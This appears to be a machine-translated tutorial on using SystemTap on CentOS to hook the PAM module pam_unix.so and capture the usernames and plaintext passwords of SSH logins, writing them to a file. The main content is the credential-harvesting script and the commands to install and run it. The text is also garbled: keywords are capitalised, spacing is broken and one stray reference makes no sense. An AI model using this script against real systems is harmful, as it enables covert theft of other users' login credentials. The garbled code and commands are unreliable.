Use systemtap in CentOS to capture the username and password for ssh Login

Use systemtap in CentOS to capture the username and password for ssh Login
Systemtap is a very powerful kernel debugging tool that can debug many issues about the kernel layer. In Linux, the PAM module detects user information and authentication information to determine whether a user can log on to the system. With this knowledge point, use systemtap to capture the function calls of the dynamic library file pam_unix.so, obtain the user name and password used for ssh remote logon.

Test environment: CentOS6.432bit

Kernel version: 2.6.32-358. el6.i686

First install the following rpm package
Yum -- releasever = 6.4 update

Yuminstall-ysystemtap

Debuginfo-install $ (rpm-qf/lib/security/pam_unix.so)

Create a file and write the following code
Touch/root/capture_pass.stp

Click (here) to fold or open

1. #! /Usr/bin/stap
2. Global username, pass, isSuccRet = 1;
3. Probe process ("/lib/security/pam_unix.so"). function ("_ unix_verify_password ")
4. {
5. Username = user_string ($ name );
6. Pass = user_string ($ p );
7. }
8. Probe process ("/lib/security/pam_unix.so"). function ("_ unix_verify_password"). return
9. {
10. If ($ return = 0)
11. {
12. Printf ("User: % s \ nPassword: % s \ n", username, pass );
13. IsSuccRet = 0;
14. }
15. }
16. Probe process ("/lib/security/pam_unix.so"). function ("pam_sm_open_session ")
17. {
18. If (isSuccRet! = 0)
19. {
20. Printf ("Login via ssh service. \ n \ User: % s \ nPassword: % s \ n", username, pass );
21. }
22. IsSuccRet = 1;
23. }

Grant executable permissions
Chmod + xcapture_pass.stp
Create a password record file
Touchpassword.txt
Execute the systemstap script
Stapcapture_pass.stp-opassword.txt

Execute the capture_pass.stp script locally and log on to the system remotely through ssh. Even if the first logon fails, no error password is recorded. After success, the ctlw.c's script is run and password.txt is captured. Systemstap is a powerful tool, so it can only be used by a Super User.